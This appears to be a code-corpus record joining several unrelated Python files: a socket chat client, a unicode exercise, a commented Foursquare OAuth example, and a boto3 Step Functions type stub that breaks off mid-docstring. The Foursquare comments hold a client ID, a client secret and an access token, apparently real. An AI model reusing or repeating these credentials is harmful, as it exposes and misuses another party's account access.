address = ('127.0.0.1', 9999)
# 初始化socket
s = socket.socket()
# 连接服务器
print('【开始连接服务器 %s:%s】' % address)
s.connect(address)
while True:
print('Server: %s' % s.recv(1024).decode('utf-8'))
msg = input('Client: ')
if not msg or msg == 'exit':
break
s.send(msg.encode('utf-8'))
# 断开连接
s.close()
print('【断开连接】') | true |
7150ddc22de19c993622d22c39f168b70ba1e165 | Python | jiuzhou18/PythonPractise | /unicode.py | UTF-8 | 238 | 2.9375 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('ABC'.encode('ascii'), "\n", b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8'));
print(len('中文'), " " ,chr(25991));
s1 = 72
s2 = 85
r = s2/s1 -1
print('The growth rate is %.1f %%' %( r)) | true |
9ff2c3e438a052155426fb1df7b6bdade94595d1 | Python | mgvaldes/miri-od-project2016 | /foursquare/foursquare_example.py | UTF-8 | 1,423 | 2.765625 | 3 | [] | no_license | # import pyfoursquare as foursquare
# # == OAuth2 Authentication ==
# #
# # This mode of authentication is the required one for Foursquare
#
# # The client id and client secret can be found on your application's Details
# # page located at https://foursquare.com/oauth/
# client_id = "OCUL4KUN0I1JLF4HANT2HONTAK2ORB1FQOE3O5MGIFNBY25G"
# client_secret = "25X3X2IRD01M4UWR4DPA1NC4DUUUOJ3NCDMBM1QT5SIKSLKB"
# callback = 'http://localhost:8080/'
#
# auth = foursquare.OAuthHandler(client_id, client_secret, callback)
#
# #First Redirect the user who wish to authenticate to.
# #It will be create the authorization url for your app
# auth_url = auth.get_authorization_url()
# print 'Please authorize: ' + auth_url
#
# #If the user accepts, it will be redirected back
# #to your registered REDIRECT_URI.
# #It will give you a code as
# #https://YOUR_REGISTERED_REDIRECT_URI/?code=CODE
# code = raw_input('The code: ').strip()
#
# #Now your server will make a request for
# #the access token. You can save this
# #for future access for your app for this user
# access_token = auth.get_access_token(code)
# print 'Your access token is ' + access_token
#
# #Now let's create an API
# api = foursquare.API(auth)
#
# #Now you can access the Foursquare API!
# result = api.venues_search(query='Burburinho', ll='-8.063542,-34.872891')
#
# #You can acess as a Model
# print dir(result[0])
#
# #Access all its attributes
# print result[0].name
#
# # access token = DUXWBHZWHD2QHDJZKV15VHDK3FT2MWCNDYT42XZUTI5XRKCY | true |
5c1d0625286c2ea95e0a120a147b3214399feddd | Python | alliefitter/boto3_type_annotations | /boto3_type_annotations_with_docs/boto3_type_annotations/stepfunctions/client.py | UTF-8 | 68,286 | 2.984375 | 3 | [
"MIT"
] | permissive | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_activity(self, name: str, tags: List = None) -> Dict:
"""
Creates an activity. An activity is a task that you write in any programming language and host on any machine that has access to AWS Step Functions. Activities must poll Step Functions using the ``GetActivityTask`` API action and respond using ``SendTask*`` API actions. This function lets Step Functions know the existence of your activity and returns an identifier for use in a state machine and when polling from the activity.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/CreateActivity>`_
**Request Syntax**
::
response = client.create_activity(
name='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'activityArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the created activity.
- **creationDate** *(datetime) --*
The date the activity is created.
:type name: string
:param name: **[REQUIRED]**
The name of the activity to create. This name must be unique for your AWS account and region for 90 days. For more information, see `Limits Related to State Machine Executions <https://docs.aws.amazon.com/step-functions/latest/dg/limits.html#service-limits-state-machine-executions>`__ in the *AWS Step Functions Developer Guide* .
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type tags: list
:param tags:
The list of tags to add to a resource.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def create_state_machine(self, name: str, definition: str, roleArn: str, tags: List = None) -> Dict:
"""
Creates a state machine. A state machine consists of a collection of states that can do work (``Task`` states), determine to which states to transition next (``Choice`` states), stop an execution with an error (``Fail`` states), and so on. State machines are specified using a JSON-based, structured language.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/CreateStateMachine>`_
**Request Syntax**
::
response = client.create_state_machine(
name='string',
definition='string',
roleArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the created state machine.
- **creationDate** *(datetime) --*
The date the state machine is created.
:type name: string
:param name: **[REQUIRED]**
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type definition: string
:param definition: **[REQUIRED]**
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
:type roleArn: string
:param roleArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the IAM role to use for this state machine.
:type tags: list
:param tags:
Tags to be added when creating a state machine.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def delete_activity(self, activityArn: str) -> Dict:
"""
Deletes an activity.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DeleteActivity>`_
**Request Syntax**
::
response = client.delete_activity(
activityArn='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to delete.
:rtype: dict
:returns:
"""
pass
def delete_state_machine(self, stateMachineArn: str) -> Dict:
"""
Deletes a state machine. This is an asynchronous operation: It sets the state machine's status to ``DELETING`` and begins the deletion process. Each state machine execution is deleted the next time it makes a state transition.
.. note::
The state machine itself is deleted after all executions are completed or deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DeleteStateMachine>`_
**Request Syntax**
::
response = client.delete_state_machine(
stateMachineArn='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to delete.
:rtype: dict
:returns:
"""
pass
def describe_activity(self, activityArn: str) -> Dict:
"""
Describes an activity.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeActivity>`_
**Request Syntax**
::
response = client.describe_activity(
activityArn='string'
)
**Response Syntax**
::
{
'activityArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the activity.
- **name** *(string) --*
The name of the activity.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the activity is created.
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to describe.
:rtype: dict
:returns:
"""
pass
def describe_execution(self, executionArn: str) -> Dict:
"""
Describes an execution.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeExecution>`_
**Request Syntax**
::
response = client.describe_execution(
executionArn='string'
)
**Response Syntax**
::
{
'executionArn': 'string',
'stateMachineArn': 'string',
'name': 'string',
'status': 'RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
'startDate': datetime(2015, 1, 1),
'stopDate': datetime(2015, 1, 1),
'input': 'string',
'output': 'string'
}
**Response Structure**
- *(dict) --*
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the executed stated machine.
- **name** *(string) --*
The name of the execution.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the execution.
- **startDate** *(datetime) --*
The date the execution is started.
- **stopDate** *(datetime) --*
If the execution has already ended, the date the execution stopped.
- **input** *(string) --*
The string that contains the JSON input data of the execution.
- **output** *(string) --*
The JSON output data of the execution.
.. note::
This field is set only if the execution succeeds. If the execution fails, this field is null.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution to describe.
:rtype: dict
:returns:
"""
pass
def describe_state_machine(self, stateMachineArn: str) -> Dict:
"""
Describes a state machine.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeStateMachine>`_
**Request Syntax**
::
response = client.describe_state_machine(
stateMachineArn='string'
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'name': 'string',
'status': 'ACTIVE'|'DELETING',
'definition': 'string',
'roleArn': 'string',
'creationDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the state machine.
- **name** *(string) --*
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the state machine.
- **definition** *(string) --*
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role used when creating this state machine. (The IAM role maintains security by granting Step Functions access to AWS resources.)
- **creationDate** *(datetime) --*
The date the state machine is created.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to describe.
:rtype: dict
:returns:
"""
pass
def describe_state_machine_for_execution(self, executionArn: str) -> Dict:
"""
Describes the state machine associated with a specific execution.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/DescribeStateMachineForExecution>`_
**Request Syntax**
::
response = client.describe_state_machine_for_execution(
executionArn='string'
)
**Response Syntax**
::
{
'stateMachineArn': 'string',
'name': 'string',
'definition': 'string',
'roleArn': 'string',
'updateDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the state machine associated with the execution.
- **name** *(string) --*
The name of the state machine associated with the execution.
- **definition** *(string) --*
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role of the State Machine for the execution.
- **updateDate** *(datetime) --*
The date and time the state machine associated with an execution was updated. For a newly created state machine, this is the creation date.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution you want state machine information for.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_activity_task(self, activityArn: str, workerName: str = None) -> Dict:
"""
Used by workers to retrieve a task (with the specified activity ARN) which has been scheduled for execution by a running state machine. This initiates a long poll, where the service holds the HTTP connection open and responds as soon as a task becomes available (i.e. an execution of a task of this type is needed.) The maximum time the service holds on to the request before responding is 60 seconds. If no task is available within 60 seconds, the poll returns a ``taskToken`` with a null string.
.. warning::
Workers should set their client side socket timeout to at least 65 seconds (5 seconds higher than the maximum time the service may hold the poll request).
Polling with ``GetActivityTask`` can cause latency in some implementations. See `Avoid Latency When Polling for Activity Tasks <https://docs.aws.amazon.com/step-functions/latest/dg/bp-activity-pollers.html>`__ in the Step Functions Developer Guide.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/GetActivityTask>`_
**Request Syntax**
::
response = client.get_activity_task(
activityArn='string',
workerName='string'
)
**Response Syntax**
::
{
'taskToken': 'string',
'input': 'string'
}
**Response Structure**
- *(dict) --*
- **taskToken** *(string) --*
A token that identifies the scheduled task. This token must be copied and included in subsequent calls to SendTaskHeartbeat , SendTaskSuccess or SendTaskFailure in order to report the progress or completion of the task.
- **input** *(string) --*
The string that contains the JSON input data for the task.
:type activityArn: string
:param activityArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the activity to retrieve tasks from (assigned when you create the task using CreateActivity .)
:type workerName: string
:param workerName:
You can provide an arbitrary name in order to identify the worker that the task is assigned to. This name is used when it is logged in the execution history.
:rtype: dict
:returns:
"""
pass
def get_execution_history(self, executionArn: str, maxResults: int = None, reverseOrder: bool = None, nextToken: str = None) -> Dict:
"""
Returns the history of the specified execution as a list of events. By default, the results are returned in ascending order of the ``timeStamp`` of the events. Use the ``reverseOrder`` parameter to get the latest events first.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/GetExecutionHistory>`_
**Request Syntax**
::
response = client.get_execution_history(
executionArn='string',
maxResults=123,
reverseOrder=True|False,
nextToken='string'
)
**Response Syntax**
::
{
'events': [
{
'timestamp': datetime(2015, 1, 1),
'type': 'ActivityFailed'|'ActivityScheduleFailed'|'ActivityScheduled'|'ActivityStarted'|'ActivitySucceeded'|'ActivityTimedOut'|'ChoiceStateEntered'|'ChoiceStateExited'|'TaskFailed'|'TaskScheduled'|'TaskStartFailed'|'TaskStarted'|'TaskSubmitFailed'|'TaskSubmitted'|'TaskSucceeded'|'TaskTimedOut'|'ExecutionFailed'|'ExecutionStarted'|'ExecutionSucceeded'|'ExecutionAborted'|'ExecutionTimedOut'|'FailStateEntered'|'LambdaFunctionFailed'|'LambdaFunctionScheduleFailed'|'LambdaFunctionScheduled'|'LambdaFunctionStartFailed'|'LambdaFunctionStarted'|'LambdaFunctionSucceeded'|'LambdaFunctionTimedOut'|'SucceedStateEntered'|'SucceedStateExited'|'TaskStateAborted'|'TaskStateEntered'|'TaskStateExited'|'PassStateEntered'|'PassStateExited'|'ParallelStateAborted'|'ParallelStateEntered'|'ParallelStateExited'|'ParallelStateFailed'|'ParallelStateStarted'|'ParallelStateSucceeded'|'WaitStateAborted'|'WaitStateEntered'|'WaitStateExited',
'id': 123,
'previousEventId': 123,
'activityFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'activityScheduleFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'activityScheduledEventDetails': {
'resource': 'string',
'input': 'string',
'timeoutInSeconds': 123,
'heartbeatInSeconds': 123
},
'activityStartedEventDetails': {
'workerName': 'string'
},
'activitySucceededEventDetails': {
'output': 'string'
},
'activityTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'taskFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskScheduledEventDetails': {
'resourceType': 'string',
'resource': 'string',
'region': 'string',
'parameters': 'string',
'timeoutInSeconds': 123
},
'taskStartFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskStartedEventDetails': {
'resourceType': 'string',
'resource': 'string'
},
'taskSubmitFailedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'taskSubmittedEventDetails': {
'resourceType': 'string',
'resource': 'string',
'output': 'string'
},
'taskSucceededEventDetails': {
'resourceType': 'string',
'resource': 'string',
'output': 'string'
},
'taskTimedOutEventDetails': {
'resourceType': 'string',
'resource': 'string',
'error': 'string',
'cause': 'string'
},
'executionFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'executionStartedEventDetails': {
'input': 'string',
'roleArn': 'string'
},
'executionSucceededEventDetails': {
'output': 'string'
},
'executionAbortedEventDetails': {
'error': 'string',
'cause': 'string'
},
'executionTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionScheduleFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionScheduledEventDetails': {
'resource': 'string',
'input': 'string',
'timeoutInSeconds': 123
},
'lambdaFunctionStartFailedEventDetails': {
'error': 'string',
'cause': 'string'
},
'lambdaFunctionSucceededEventDetails': {
'output': 'string'
},
'lambdaFunctionTimedOutEventDetails': {
'error': 'string',
'cause': 'string'
},
'stateEnteredEventDetails': {
'name': 'string',
'input': 'string'
},
'stateExitedEventDetails': {
'name': 'string',
'output': 'string'
}
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **events** *(list) --*
The list of events that occurred in the execution.
- *(dict) --*
Contains details about the events of an execution.
- **timestamp** *(datetime) --*
The date and time the event occurred.
- **type** *(string) --*
The type of the event.
- **id** *(integer) --*
The id of the event. Events are numbered sequentially, starting at one.
- **previousEventId** *(integer) --*
The id of the previous event.
- **activityFailedEventDetails** *(dict) --*
Contains details about an activity that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **activityScheduleFailedEventDetails** *(dict) --*
Contains details about an activity schedule event that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **activityScheduledEventDetails** *(dict) --*
Contains details about an activity scheduled during an execution.
- **resource** *(string) --*
The Amazon Resource Name (ARN) of the scheduled activity.
- **input** *(string) --*
The JSON data input to the activity task.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the activity task.
- **heartbeatInSeconds** *(integer) --*
The maximum allowed duration between two heartbeats for the activity task.
- **activityStartedEventDetails** *(dict) --*
Contains details about the start of an activity during an execution.
- **workerName** *(string) --*
The name of the worker that the task is assigned to. These names are provided by the workers when calling GetActivityTask .
- **activitySucceededEventDetails** *(dict) --*
Contains details about an activity that successfully terminated during an execution.
- **output** *(string) --*
The JSON data output by the activity task.
- **activityTimedOutEventDetails** *(dict) --*
Contains details about an activity timeout that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **taskFailedEventDetails** *(dict) --*
Contains details about the failure of a task.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskScheduledEventDetails** *(dict) --*
Contains details about a task that was scheduled.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **region** *(string) --*
The region of the scheduled task
- **parameters** *(string) --*
The JSON data passed to the resource referenced in a task state.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the task.
- **taskStartFailedEventDetails** *(dict) --*
Contains details about a task that failed to start.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskStartedEventDetails** *(dict) --*
Contains details about a task that was started.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **taskSubmitFailedEventDetails** *(dict) --*
Contains details about a task that where the submit failed.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **taskSubmittedEventDetails** *(dict) --*
Contains details about a submitted task.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **output** *(string) --*
The response from a resource when a task has started.
- **taskSucceededEventDetails** *(dict) --*
Contains details about a task that succeeded.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **output** *(string) --*
The full JSON response from a resource when a task has succeeded. This response becomes the output of the related task.
- **taskTimedOutEventDetails** *(dict) --*
Contains details about a task that timed out.
- **resourceType** *(string) --*
The action of the resource called by a task state.
- **resource** *(string) --*
The service name of the resource in a task state.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionFailedEventDetails** *(dict) --*
Contains details about an execution failure event.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionStartedEventDetails** *(dict) --*
Contains details about the start of the execution.
- **input** *(string) --*
The JSON data input to the execution.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) of the IAM role used for executing AWS Lambda tasks.
- **executionSucceededEventDetails** *(dict) --*
Contains details about the successful termination of the execution.
- **output** *(string) --*
The JSON data output by the execution.
- **executionAbortedEventDetails** *(dict) --*
Contains details about an abort of an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **executionTimedOutEventDetails** *(dict) --*
Contains details about the execution timeout that occurred during the execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **lambdaFunctionFailedEventDetails** *(dict) --*
Contains details about a lambda function that failed during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionScheduleFailedEventDetails** *(dict) --*
Contains details about a failed lambda function schedule event that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionScheduledEventDetails** *(dict) --*
Contains details about a lambda function scheduled during an execution.
- **resource** *(string) --*
The Amazon Resource Name (ARN) of the scheduled lambda function.
- **input** *(string) --*
The JSON data input to the lambda function.
- **timeoutInSeconds** *(integer) --*
The maximum allowed duration of the lambda function.
- **lambdaFunctionStartFailedEventDetails** *(dict) --*
Contains details about a lambda function that failed to start during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the failure.
- **lambdaFunctionSucceededEventDetails** *(dict) --*
Contains details about a lambda function that terminated successfully during an execution.
- **output** *(string) --*
The JSON data output by the lambda function.
- **lambdaFunctionTimedOutEventDetails** *(dict) --*
Contains details about a lambda function timeout that occurred during an execution.
- **error** *(string) --*
The error code of the failure.
- **cause** *(string) --*
A more detailed explanation of the cause of the timeout.
- **stateEnteredEventDetails** *(dict) --*
Contains details about a state entered during an execution.
- **name** *(string) --*
The name of the state.
- **input** *(string) --*
The string that contains the JSON input data for the state.
- **stateExitedEventDetails** *(dict) --*
Contains details about an exit from a state during an execution.
- **name** *(string) --*
The name of the state.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **output** *(string) --*
The JSON output data of the state.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type reverseOrder: boolean
:param reverseOrder:
Lists events in descending order of their ``timeStamp`` .
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_activities(self, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the existing activities.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListActivities>`_
**Request Syntax**
::
response = client.list_activities(
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'activities': [
{
'activityArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **activities** *(list) --*
The list of activities.
- *(dict) --*
Contains details about an activity.
- **activityArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the activity.
- **name** *(string) --*
The name of the activity.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the activity is created.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def list_executions(self, stateMachineArn: str, statusFilter: str = None, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the executions of a state machine that meet the filtering criteria. Results are sorted by time, with the most recent execution first.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListExecutions>`_
**Request Syntax**
::
response = client.list_executions(
stateMachineArn='string',
statusFilter='RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'executions': [
{
'executionArn': 'string',
'stateMachineArn': 'string',
